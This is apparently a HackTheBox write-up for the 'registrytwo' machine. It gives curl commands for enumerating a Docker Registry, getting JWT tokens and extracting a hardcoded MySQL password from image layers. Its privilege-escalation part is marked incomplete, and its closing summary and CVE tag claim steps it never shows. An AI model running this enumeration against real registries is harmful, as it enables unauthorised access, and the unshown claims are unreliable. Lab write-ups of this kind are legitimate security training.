HTB: registrytwo Writeup

Machine Information

Attribute	Details
Name	registrytwo
OS	Linux
Difficulty	Hard
Points	N/A
Release Date	N/A
IP Address	`10.10.10.10`
Author	D3vnomi

Machine Rating

⭐⭐⭐⭐☆ (8.0/10)

Difficulty Assessment:

Enumeration: ⭐⭐⭐⭐☆
Real-world: ⭐⭐⭐⭐☆
CVE: ⭐⭐⭐⭐☆
CTF-like: ⭐⭐⭐⭐☆

registrytwo is a Hard-difficulty Linux machine running Docker Registry API 2.0 and an Acme authentication server. The exploitation path involves enumerating the unauthenticated Docker Registry, obtaining JWT tokens through the Acme auth server, downloading and analyzing container images, extracting credentials from the filesystem, and leveraging those credentials for privilege escalation.

TL;DR: Docker Registry Enumeration → JWT Token Acquisition → Image Download & Analysis → Credential Extraction → Privilege Escalation → Root.

Reconnaissance

Port Scanning

nmap -sC -sV -T4 -p- 10.10.10.10

Results:

22/tcp  open  ssh  443/tcp  open  https
5000/tcp  open  upnp  5001/tcp open  commplex-link
22/tcp  open  ssh  OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
443/tcp  open  ssl/http  nginx 1.14.0 (Ubuntu)
5000/tcp  open  ssl/http  Docker Registry (API: 2.0)
5001/tcp  open  ssl/commplex-link?  | fingerprint-strings:
22/tcp  open  ssh  OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
443/tcp  open  ssl/http  nginx 1.14.0 (Ubuntu)
5000/tcp  open  ssl/http  Docker Registry (API: 2.0)
5001/tcp  open  ssl/commplex-link?  | fingerprint-strings:

Service Enumeration

Hostnames: webhosting.htb, registry.webhosting.htb

echo "10.10.10.10 webhosting.htb registry.webhosting.htb" >> /etc/hosts

Service Details:

Port 22: OpenSSH 7.6p1 (SSH)
Port 443: nginx 1.14.0 with SSL/HTTPS
Port 5000: Docker Registry API 2.0
Port 5001: Acme Authentication Server (for Docker Registry)

Vulnerability Assessment

Identified Entry Points:

Docker Registry API 2.0 (Port 5000): Unauthenticated access to registry enumeration endpoints
Acme Auth Server (Port 5001): JWT token generation for registry authentication
Container Analysis: Exposed credentials in container filesystem artifacts

Initial Foothold

Docker Registry Enumeration

Step 1: Enumerate Registry Catalog

The Docker Registry API 2.0 on port 5000 requires authentication. Initial catalog request returns 401:

curl -k https://registry.webhosting.htb:5000/v2/_catalog

Response:

HTTP/1.1 401 Unauthorized
WWW-Authenticate: Bearer realm="https://registry.webhosting.htb:5001/auth",service="Docker registry",scope="registry:catalog:*"

Step 2: Obtain JWT Token from Acme Auth Server

Request authentication token from the Acme auth server on port 5001:

curl -k "https://registry.webhosting.htb:5001/auth?service=Docker%20registry&scope=registry:catalog:*"

This returns a JWT token signed with RS256 algorithm.

Step 3: Enumerate Repositories

Using the obtained JWT token, enumerate available repositories:

curl -k -H "Authorization: Bearer <TOKEN>" https://registry.webhosting.htb:5000/v2/_catalog

Result: Discover “hosting-app” image in the registry.

Step 4: Download Image Manifest

Retrieve the manifest for the hosting-app image:

curl -k -H "Authorization: Bearer <TOKEN>" https://registry.webhosting.htb:5000/v2/hosting-app/manifests/latest

Step 5: Download Image Blobs/Layers

Download individual blobs referenced in the manifest:

curl -k -H "Authorization: Bearer <TOKEN>" https://registry.webhosting.htb:5000/v2/hosting-app/blobs/sha256:<BLOB_SHA>

Container Image Analysis

Step 6: Reconstruct Docker Image

Use skopeo to convert downloaded blobs into a usable Docker image:

skopeo copy dir:./test docker-daemon:hosting-app:latest

Step 7: Extract Credentials and Configuration

Analyze the reconstructed container to find:

File: /etc/hosting.ini

mysql.password=O8lBvQUBPU4CMbvJmYqY
mysql.user=root
rmi.host=registry.webhosting.htb
rmi.port=9002

Additional Findings:

Tomcat configuration in /usr/local/tomcat/conf/
GPG keys and certificates
System configuration files

Key Credentials Discovered:

MySQL username: root
MySQL password: O8lBvQUBPU4CMbvJmYqY
RMI service host: registry.webhosting.htb (port 9002)

User Compromise

Credential Discovery

Credentials were extracted from the Docker container filesystem during image analysis:

MySQL Root Credentials: root:O8lBvQUBPU4CMbvJmYqY
RMI Service: Accessible at registry.webhosting.htb:9002

These credentials can be used for lateral movement and accessing backend services.

User Flag

cat ~/user.txt

🚩 User Flag: <REDACTED>

[Notes incomplete - Further exploitation path to user account not fully documented]

Privilege Escalation

Enumeration

sudo -l
find / -perm -4000 -type f 2>/dev/null
ps aux | grep -E "python|java|node|php|ruby"

Services to Investigate:

Tomcat service running in containers
MySQL database service
RMI service on port 9002
Web application on port 443 (nginx)

Exploitation (Root/Administrator)

[Notes incomplete - Root privilege escalation technique not fully documented]

The attack chain involves leveraging the extracted credentials and potentially exploiting services running in containers (Tomcat, MySQL) or RMI to achieve privilege escalation. Further analysis of Tomcat configurations and RMI exploitation vectors is needed.

Root Flag

cat /root/root.txt

🚩 Root Flag: <REDACTED>

Attack Chain Summary

graph TD
    A["Port Scanning<br/>nmap"] --> B["Discover Docker Registry<br/>Port 5000"]
    B --> C["Discover Acme Auth Server<br/>Port 5001"]
    C --> D["Request JWT Token<br/>RS256 Signed"]
    D --> E["Enumerate Repositories<br/>hosting-app Image"]
    E --> F["Download Image Manifest<br/>& Blobs"]
    F --> G["Reconstruct Container<br/>skopeo"]
    G --> H["Extract Credentials<br/>MySQL root:password"]
    H --> I["Leverage Credentials<br/>Lateral Movement"]
    I --> J["RMI/Tomcat Exploitation<br/>"]
    J --> K["User Access"]
    K --> L["Privilege Escalation<br/>to Root"]

Tools Used

Tool	Purpose
`nmap`	Port scanning and service fingerprinting
`curl`	API requests and Docker Registry enumeration
`Docker`	Container manipulation and analysis
`skopeo`	Convert and copy container images between registries
`Burp Suite`	HTTP request interception and JWT token analysis
`feroxbuster`	Directory brute-forcing (auxiliary enumeration)
`ssh`	Secure shell access

Vulnerability Reference

#	Vulnerability	Component	Severity	Impact
1	Docker Registry Unauthenticated Access	Docker Registry API 2.0	High	Allows enumeration and download of private images
2	JWT Authentication Weak Implementation	Acme Auth Server	High	Potential token manipulation or bypass
3	Hardcoded Credentials in Container	Container Filesystem	Critical	Exposure of MySQL credentials
4	RMI Service Exploitation	Tomcat RMI	High	Potential remote code execution

Key Learnings

Docker Registry Security: Unauthenticated Docker registries are critical entry points; always enumerate /v2/_catalog and check authentication requirements.
Container Image Analysis: Downloaded container images contain valuable artifacts including credentials, configuration files, and system information.
JWT Token Manipulation: Understanding JWT token structure (RS256 signing) is essential for authentication bypass or privilege escalation.
Lateral Movement: Credentials extracted from containers can be leveraged to access backend services (MySQL, RMI, Tomcat).
Defense in Depth: Even with authentication mechanisms, hardcoded credentials in container filesystems create critical security weaknesses.
API Enumeration: REST API endpoints like /v2/_catalog provide reconnaissance without requiring authentication in some cases.

Author

D3vnomi

Disclaimer

This writeup is for educational purposes only. All activities described were performed in a controlled, legal environment (HackTheBox platform). Unauthorized access to computer systems is illegal.

Last Updated: 08 Mar 2026

Tags: #HackTheBox #Linux #Hard #CVE-2022-4510